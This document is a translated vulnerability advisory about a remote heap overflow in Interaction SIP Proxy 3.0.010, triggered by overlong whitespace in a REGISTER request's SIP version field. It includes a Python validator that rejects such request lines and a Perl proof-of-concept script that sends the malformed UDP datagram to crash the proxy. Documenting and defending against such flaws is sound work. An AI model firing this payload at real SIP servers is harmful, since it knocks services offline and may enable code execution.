Interaction SIP Proxy Remote Heap Overflow Vulnerability

Published: 2005-12-21
Updated: 2005-12-21

Affected systems:
Interactive Intelligence Interaction SIP Proxy 3.0.010

Description:
BUGTRAQ ID: 16001

Interaction SIP Proxy is a SIP proxy server that runs on Microsoft Windows.

Interaction SIP Proxy contains a vulnerability in its handling of overlong REGISTER requests; a remote attacker may exploit it to execute arbitrary instructions on the server.

The code in i3sipmsg.dll of Interaction SIP Proxy is responsible for handling SIP requests. If an attacker sends 2900 space (0x20) or TAB (0x09) characters in place of the SIP version in the REGISTER request line, a heap overflow occurs in the SIPParser function. An attacker who successfully exploits this vulnerability can cause a denial of service and may also be able to execute arbitrary code.
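The request line the advisory describes is not valid SIP at all: RFC 3261 defines the version field as "SIP/" followed by digits, a dot and digits, so a run of whitespace where "2.0" belongs violates the grammar before any parser needs to copy it anywhere. The following check, an added example that is not code from the advisory, from Hat-Squad or from the vendor, validates the request line of a UDP datagram before it is handed to a message parser, which is the kind of front-end or IDS-style guard that would have rejected this input. The length cap MAX_REQUEST_LINE and all sample datagrams are assumptions constructed for the example.

```python
import re

# RFC 3261 section 25.1 grammar for the first line of a request:
#   Request-Line = Method SP Request-URI SP SIP-Version CRLF
#   SIP-Version  = "SIP" "/" 1*DIGIT "." 1*DIGIT
# Exactly one space separates the three fields and the version token has a
# short fixed shape, so spaces or tabs in place of "2.0" never match.
# Method is an RFC 3261 token so that extension methods are not rejected.
_REQUEST_LINE = re.compile(
    rb"^(?P<method>[A-Za-z0-9.!%*_+`'~-]+) (?P<uri>\S+) (?P<version>SIP/\d+\.\d+)$"
)

# Defence-in-depth cap on the whole request line. The value is an assumption
# chosen for this example (it is not from the advisory or the RFC); a real
# REGISTER request line is a few dozen bytes.
MAX_REQUEST_LINE = 512


def check_request_line(datagram: bytes) -> dict:
    """Validate the request line of one SIP datagram before it reaches a parser.

    Returns a dict with ok=True and the parsed fields, or ok=False and a
    reason. The length is checked before the grammar so an oversized line is
    rejected without doing any further work on it.
    """
    end = datagram.find(b"\r\n")
    first = datagram if end < 0 else datagram[:end]
    if len(first) > MAX_REQUEST_LINE:
        return {"ok": False, "reason": "request line too long", "length": len(first)}
    m = _REQUEST_LINE.match(first)
    if m is None:
        return {"ok": False, "reason": "request line violates RFC 3261 grammar",
                "length": len(first)}
    return {
        "ok": True,
        "method": m["method"].decode("ascii"),
        "uri": m["uri"].decode("ascii"),
        "version": m["version"].decode("ascii"),
        "length": len(first),
    }


# Constructed sample datagrams for a self-test; none are captured traffic.
GOOD_REGISTER = (
    b"REGISTER sip:alice@example.com SIP/2.0\r\n"
    b"Via: SIP/2.0/UDP 192.0.2.10:5060\r\n"
    b"Max-Forwards: 70\r\n"
    b"From: <sip:alice@example.com>;tag=1928301774\r\n"
    b"To: <sip:alice@example.com>\r\n"
    b"Call-ID: a84b4c76e66710@192.0.2.10\r\n"
    b"CSeq: 1 REGISTER\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)
# The shape the advisory describes: whitespace where the version number belongs,
# padded with spaces (0x20) and, separately, with tabs (0x09).
OVERLONG_SPACES = (b"REGISTER sip:alice@example.com SIP/" + b"\x20" * 2900
                   + b"\r\nContent-Length: 0\r\n\r\n")
OVERLONG_TABS = (b"REGISTER sip:alice@example.com SIP/" + b"\x09" * 2900
                 + b"\r\nContent-Length: 0\r\n\r\n")
# Short enough to pass the length cap, so only the grammar check rejects it.
SHORT_PADDED = b"REGISTER sip:alice@example.com SIP/" + b"\x20" * 40 + b"\r\n\r\n"

if __name__ == "__main__":
    for name, msg in [("good", GOOD_REGISTER), ("spaces", OVERLONG_SPACES),
                      ("tabs", OVERLONG_TABS), ("short", SHORT_PADDED)]:
        print(name, check_request_line(msg))
```

The two layers are deliberate: the length cap bounds the work done on hostile input, and the grammar match rejects the malformed version field even when the padding is short enough to pass the cap. A proxy that applied either check to the request line before copying it into a fixed-size heap buffer would have dropped the request rather than overflowing.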

<*Source: Behrang Fouladi (behrang@hat-squad.com)
          Brett Moore (brett.moore@SECURITY-ASSESSMENT.COM)

  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=113519223917192&w=2
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Use at your own risk!

#! /usr/bin/perl

##
#i3 SIP Proxy POC - http://www.hat-squad.com/en/000171.html
#This vulnerability allows a remote user to overwrite heap memory of i3sipproxy.
#The request size varies, but size=2900 bytes works in most of the cases. Successful
#exploitation of this bug for code execution requires a magic combination of
#pre-allocations, data and size.
#

use strict;
use warnings;
use Socket;            # inet_aton, sockaddr_in, PF_INET, SOCK_DGRAM
use IO::Socket::INET;

my $host = shift(@ARGV);   # proxy host to send the request to
my $size = shift(@ARGV);   # number of padding bytes placed in the SIP-Version field
my $port = 5060;           # default SIP port

print "\n\n Interactive SIP proxy heap corruption POC \n\n";
print " By Behrang Fouladi, Hat-Squad Security Team \n\n";
unless ($host && $size) {
    print " Usage: perl $0 <host> <size>\n\n";
    exit;
}
my $iaddr = inet_aton($host) || die("Unable to resolve $host");

# UDP datagram socket (IP protocol number 17 = UDP).
socket(DoS, PF_INET, SOCK_DGRAM, 17) || die("socket: $!");

# REGISTER request whose SIP-Version field is $size space (0x20) characters
# instead of "2.0": the malformed request line the advisory describes.
my $sip = "REGISTER sip:test\@test.com SIP/";
$sip .= "\x20" x $size;
$sip .= "\r\n";
$sip .= "Via: SIP/2.0/TCP 192.168.0.1:7043\r\n";
$sip .= "Max-Forwards: 70\r\n";
# The angle-bracketed URIs of the From, To and Contact headers are missing
# from this listing; the overflow depends only on the request line.
$sip .= "From: ;tag=ec8c2399e9\r\n";
$sip .= "To: \r\n";
$sip .= "Call-ID: 1b6c7397b109453c93d85edc88d9810e\r\n";
$sip .= "CSeq: 1 REGISTER\r\n";
$sip .= "Contact: ;methods=\"INVITE, MESSAGE, INFO, SUBSCRIBE, OPTIONS, BYE, CANCEL, NOTIFY, ACK, REFER, BENOTIFY\";proxy=replace\r\n";
$sip .= "Content-Length: 0\r\n";
$sip .= "\r\n";

send(DoS, $sip, 0, sockaddr_in($port, $iaddr)) || die("send: $!");
print " Exploit Sent to $host...\n";
print " The SIP Proxy should crash now.\n\n";
exit(0);

Recommendation:
Vendor patch:

Interactive Intelligence
------------------------
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version:

http://www.inin.com/SIPProxy/default.asp

This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.